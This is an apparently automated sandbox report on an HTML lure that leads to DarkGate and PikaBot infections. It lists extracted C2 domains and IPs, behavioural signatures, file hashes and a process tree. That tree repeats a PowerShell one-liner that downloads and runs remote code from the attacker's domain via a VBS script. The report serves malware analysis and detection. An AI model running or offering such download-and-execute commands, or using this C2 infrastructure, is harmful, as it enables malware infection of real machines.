Analysis
-
max time kernel
358s -
max time network
325s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
-
submitted
26-03-2024 15:09
General
-
Target
march26.html
-
Size
3KB
-
MD5
ace67f099683c4360f442c58da66aeba
-
SHA1
2b90f1398b79331e8f853ddb004dcc87a1daf540
-
SHA256
196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
-
SHA512
02e2465e10ee581b04896dd77ee906542786b7662071befa9b6c07fca00862be063516030045fb29fdec1a68108aaf93cc30db24cd329776b1d316c9d7ca7073
Malware Config
Extracted
darkgate
admin888
withupdate.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
VqunyHFY
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Extracted
pikabot
158.220.95.214
172.232.208.90
194.233.91.144
158.220.95.215
84.247.157.112
Signatures
-
DarkGate
DarkGate is an infostealer written in C++.
-
Detect DarkGate stealer 6 IoCs
-
PikaBot
PikaBot is a botnet that is distributed similarly to Qakbot and written in c++.
-
Blocklisted process makes network request 20 IoCs
-
Executes dropped EXE 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 58 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 28 IoCs
-
Suspicious use of SendNotifyMessage 26 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\march26.html1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffbae69758,0x7fffbae69768,0x7fffbae697782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2804 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2812 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4744 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3668 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3560 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4464 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FJZ9UFDF\Report-26-2024[1].vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\rjtu\AutoHotkey.exe"C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk3⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rjtu/3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Report-26-2024.zip\Report-26-2024.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\rjtu\AutoHotkey.exe"C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rjtu/3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CG01HQSW\Report-26-2024[1].vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\rjtu\AutoHotkey.exe"C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rjtu/3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FJZ9UFDF\Report-26-2024[1].vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\rjtu\AutoHotkey.exe"C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rjtu/3⤵
- Views/modifies file attributes
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\Report-26-2024.vbs1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\abcdef.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Report-26-2024.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\rjtu\AutoHotkey.exe"C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rjtu/3⤵
- Views/modifies file attributes
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\00.exe"C:\Users\Admin\Desktop\00.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Windows\SysWOW64\ctfmon.exe"C:\Windows\SysWOW64\ctfmon.exe -p 1234"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\adedhek\eaaeegkFilesize
1KB
MD559bc6e3f17505255957f6fe2ff7aca8d
SHA197a53aa461741cca507d23ddd3a94e481f5cc6da
SHA256266e25a74ab4867f4803bf03e34cbfc6992963b2863e2136ca64a7ef754abb99
SHA512c75dd6ecf2462c02962475c874b774c8fcb57a28bd3fb3e53d843a52c2e807c0f9bd68525566f7c18654962968849b6d0754e59c58ff9d0c247fbc1b8e345958
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
977B
MD5fadab0c760429bd9dfa9593c6b9ca6b2
SHA1aa18180c804f274d9b19c3154578ef5eab4d147c
SHA256f38427938f5459d21df1b1784b3e823ec1efcdb7b6038cc07fea98a446aedf36
SHA512c16586bfd141c0290aa51afc0e27f9ff77ea281a7a3ee831e1593df181647f68fd355cffea940986c32f89995a8d1660150c88efaba5ce6e4ddb7ec7d79a826e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
706B
MD5dd44fdcb849677bd5d3fc6465724b513
SHA1b7c800d14dbefd5f9edb5699e3e05d41cf4df0b6
SHA2569e8f41e2ea621ddcf43041cb0649a8db8271d863dd3d5ef1fd1dd188258aefae
SHA51297113de38bce7d90957efae1d1433017fbd6940d5e2808296bdae626af173ad8fed6b747f65bff9708cfa6a81ff675201c50aab2a024cc829e2306c6755deaf8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD508737ae1fb5e528e89064324a054ef77
SHA19dd27222762cfd94e547bca3721f0380faadfdaa
SHA256e369e2162bc7d9dc7d72f441ee5524078a521ef79ea92b6f70b7d1a382e48e58
SHA5121111fd599f3a74d6b5726bb393d03c247d25a77c73b0ff222f69029b78c3846545cb8fa3fcd05325e25172b8c6822428894968846c8f1a856ad74260d1c24a5d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5eb395bec164bfb1108d8fed232d0105a
SHA12bb6b404e15ad52146a4f5df94fc7aa8624a220b
SHA2566ffb6e40554a5c3de732b04a4ce3f3848fea24cd96c324f65e941cc97c360210
SHA5124b8195cb135b17c9af22753da7d1d0324fa9112c46d32bb2494fc311e85ef9b3691f9b711dfed3d9e942d898e264715dd4658a7b9d9c628148a8ab1b796699fc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD52c0063ad3eac37aef67426eacf464118
SHA1d2162193e5d29521ca4dfbc6f28e9bf374442861
SHA2561ddebd86225da8b2c67e5070603855d89338cedc10c0cd3050cd9b392591bb50
SHA5129364a691cdc01dd7b57a65756bf32ed579541864dfca8fe5525f95d266016297dedd44f126a73e1a09cf95ef1ad69c15c60d7f8245b1f1fc724ea43a7664ecb0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
130KB
MD56706b3c09040742ba0b2f6233de1bd7b
SHA1d84733100653629825a4f50d175f5969f9555cc9
SHA2561e5865f1d95d7effc9fcbf75779eb50f4c52c147c506a20e99cf364f9ca2124c
SHA5127dec5419f72f689c91bd558371b062d9e3af6d4bb1d26221cf179791dde41b653f68869d19cd2667a77f3ac84709638c1bdcd3aaf74c66178103d30730e46955
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.jsonFilesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f249246e14b54dbdabfe884e240147f1
SHA167ab751f7f9c2be51b55d61cd2f70cdff1c4a1fa
SHA256eedb16dc0348b1b341fbf579d25594a1b3ab7d7d20763af44441720690842555
SHA512a4a20ac7b3653f99c65b23949b14454eaf6c5b34037973b1fb989242842b6183c191ebb52311a4cf7699874e55b913bb96d30db8c4263b8a484c2c1d29832a15
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55aa60bc45a9c2e289638c36be6134002
SHA11bb4ddcc5b34618e3e3a536fde7e06c93a582a24
SHA256c6ab9c906dc0fdb29fdda96f4323e78cc636ad4ce174dc1aab3b6f094af3c232
SHA512ae905c06f3241efdba37ab9cc6f89f245450f1845e2c36f12b74ad4dd5bcfbeefb1bbed6db3f171dfff0dda521af3fe50fa97236861d4bbe335fccb7ccc3f5ab
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e3774fd877d2ca6983ea47d6a9913e08
SHA12e2aecfd26003906681304300db00fa5d24bb1d8
SHA256d12d3a77c895fe8300e49c5ee3f522fb0c051f32fe3f200343f906df50abc0e5
SHA512a3f7e16651669090ababeef50d11ed810547d157cb400ba1a4a436dd5e695d788037ec501f554721818343295a3e1db537c668321beda8620ef1981099076349
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55dc8a97e9548d8fe0d250acf7355be25
SHA12495edadd20545a5a4948159ab2bfaf88b14ce24
SHA2568ebc65b71df0fbf6d10b139b91620eaad9b0db8f9e5ed5b706832d105ae99073
SHA5128d07dd998b82b134118aa38d91e2b9054c8482908f2b4dfdb4f29a33b159418363b2254bd42776f3a4b3b0de4896e66115f71d6c9c69b6933fbf2525a057d351
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ed5ylt2a.ezl.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\HcbabKcFilesize
32B
MD5dbbe32bb99d6389f92c4a98a9a54cbd3
SHA18b73dd0d4c7c2327a49dbb8bebf961748a98eb8f
SHA25686a15e5a36b9a0575bea521f7d0694d446f4c611dfd82bb865ea57c9097830a1
SHA512748382f98ac931fc3a4b83a72e2470d806694641fabb0453d895614b91382cc15d06eaa5ee099e58def7aadf7682275b0906ac5cd16e54b641dd0dc9bb936839
-
C:\Users\Admin\Desktop\abcdef.txtFilesize
12KB
MD5b371387b0b5551c936c94bdf36c2e2f5
SHA12f40590d998688bd681ea0afcea615b6a348cb31
SHA256038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
SHA5122c31bc7357c6b87b85cf44cedb9b864c6050544707a0f053121833ce677b99fa1094b2850b4ac73520e31b4804830d39f96ae506ae57f4fa7c49e9f04317b057
-
C:\rjtu\AutoHotkey.exeFilesize
832KB
MD504004eddef5bd52aff221a98bbaecb57
SHA1312b0a82d72352b655bde297a9af0239f6fa881a
SHA256dc68b929700bdba1a3f8812edd6430996018c7fe1a48bba504bc6880c1b22fd2
SHA51221cd583479e477b8e255344e66d77b40040e09ac012aec5cc1ba021d414ba99f42981869ad0d18f4c5790b3915f2a5c6918d70e84b3ae013092048158d88a49b
-
C:\rjtu\AutoHotkey.exeFilesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
C:\rjtu\script.ahkFilesize
55KB
MD5e93f832ee64b07207c38479dbf3ee767
SHA17f4a0063a53ed2ba9c2c2e77eacea34ccfbb99f7
SHA256dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
SHA512f46fafc946b0155ab43df99e92f5050e8967ac9528a465afc027801b20431d1c5c8f44a10c04738a995b8819f173e6cf270ab70ed352f69794cef9176f52fe51
-
C:\rjtu\test.txtFilesize
917KB
MD557e19b367883bff9e4f0d905c7634827
SHA144afaac68c4792effefcaa63c65c55ef5d089a59
SHA2564de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
SHA512dba68357c5d3427171a023919f29d8fc60905708f55acbadb24d5f4b23c355b38994dc6b8c377d6578950e499b205eeb5c9b5ae25885223c2f499e1380fc6c84
-
\??\pipe\crashpad_2380_GHUNZXZDVHRCWYFAMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/344-459-0x00000000023B0000-0x00000000023E3000-memory.dmpFilesize
204KB
-
memory/344-457-0x00000000022C0000-0x00000000022D3000-memory.dmpFilesize
76KB
-
memory/344-461-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/344-432-0x00000000023B0000-0x00000000023E3000-memory.dmpFilesize
204KB
-
memory/344-431-0x0000000000400000-0x000000000055E000-memory.dmpFilesize
1.4MB
-
memory/1280-373-0x0000000002D80000-0x0000000002DF3000-memory.dmpFilesize
460KB
-
memory/1280-371-0x0000000002D80000-0x0000000002DF3000-memory.dmpFilesize
460KB
-
memory/1608-151-0x0000000000B80000-0x0000000000BF3000-memory.dmpFilesize
460KB
-
memory/1688-283-0x00000000028A0000-0x0000000002913000-memory.dmpFilesize
460KB
-
memory/1688-285-0x00000000028A0000-0x0000000002913000-memory.dmpFilesize
460KB
-
memory/2356-166-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/2356-196-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-379-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/2356-244-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-380-0x0000022B79D90000-0x0000022B79DA0000-memory.dmpFilesize
64KB
-
memory/2356-263-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/2356-264-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-382-0x0000022B79D90000-0x0000022B79DA0000-memory.dmpFilesize
64KB
-
memory/2356-171-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-169-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-400-0x0000022B79D90000-0x0000022B79DA0000-memory.dmpFilesize
64KB
-
memory/2356-281-0x0000018D5AD30000-0x0000018D5AE68000-memory.dmpFilesize
1.2MB
-
memory/2356-282-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-427-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/2356-428-0x0000022B79D90000-0x0000022B79DA0000-memory.dmpFilesize
64KB
-
memory/2356-286-0x0000018D5A6C0000-0x0000018D5A6D0000-memory.dmpFilesize
64KB
-
memory/2356-429-0x0000022B79D90000-0x0000022B79DA0000-memory.dmpFilesize
64KB
-
memory/2356-430-0x0000022B79D90000-0x0000022B79DA0000-memory.dmpFilesize
64KB
-
memory/2356-307-0x0000018D5AD30000-0x0000018D5AE68000-memory.dmpFilesize
1.2MB
-
memory/2356-308-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/2356-443-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/3588-265-0x000001AF81CF0000-0x000001AF81D00000-memory.dmpFilesize
64KB
-
memory/3588-280-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/3588-191-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/3588-194-0x000001AF81CF0000-0x000001AF81D00000-memory.dmpFilesize
64KB
-
memory/3588-195-0x000001AF81CF0000-0x000001AF81D00000-memory.dmpFilesize
64KB
-
memory/3588-213-0x000001AF81CF0000-0x000001AF81D00000-memory.dmpFilesize
64KB
-
memory/3588-279-0x000001AF9A570000-0x000001AF9A6A8000-memory.dmpFilesize
1.2MB
-
memory/3612-310-0x0000000002D00000-0x0000000002D73000-memory.dmpFilesize
460KB
-
memory/3612-312-0x0000000002D00000-0x0000000002D73000-memory.dmpFilesize
460KB
-
memory/4152-449-0x00000000004D0000-0x00000000004EA000-memory.dmpFilesize
104KB
-
memory/4152-444-0x00000000004D0000-0x00000000004EA000-memory.dmpFilesize
104KB
-
memory/4280-133-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/4280-108-0x0000013FD1160000-0x0000013FD1170000-memory.dmpFilesize
64KB
-
memory/4280-87-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/4280-150-0x00007FFFA3FA0000-0x00007FFFA498C000-memory.dmpFilesize
9.9MB
-
memory/4280-136-0x0000013FD1160000-0x0000013FD1170000-memory.dmpFilesize
64KB
-
memory/4280-135-0x0000013FD1160000-0x0000013FD1170000-memory.dmpFilesize
64KB
-
memory/4280-134-0x0000013FD1160000-0x0000013FD1170000-memory.dmpFilesize
64KB
-
memory/4280-88-0x0000013FD1160000-0x0000013FD1170000-memory.dmpFilesize
64KB
-
memory/4280-113-0x0000013FD1BD0000-0x0000013FD1D92000-memory.dmpFilesize
1.8MB
-
memory/4280-89-0x0000013FD1160000-0x0000013FD1170000-memory.dmpFilesize
64KB
-
memory/4280-93-0x0000013FD1450000-0x0000013FD14C6000-memory.dmpFilesize
472KB
-
memory/4280-90-0x0000013FD12A0000-0x0000013FD12C2000-memory.dmpFilesize
136KB
-
memory/4964-340-0x0000017088AE0000-0x0000017088AF0000-memory.dmpFilesize
64KB
-
memory/4964-370-0x00007FFFA3660000-0x00007FFFA404C000-memory.dmpFilesize
9.9MB
-
memory/4964-317-0x0000017088AE0000-0x0000017088AF0000-memory.dmpFilesize
64KB
-
memory/4964-319-0x0000017088AE0000-0x0000017088AF0000-memory.dmpFilesize
64KB
-
memory/4964-316-0x00007FFFA3660000-0x00007FFFA404C000-memory.dmpFilesize
9.9MB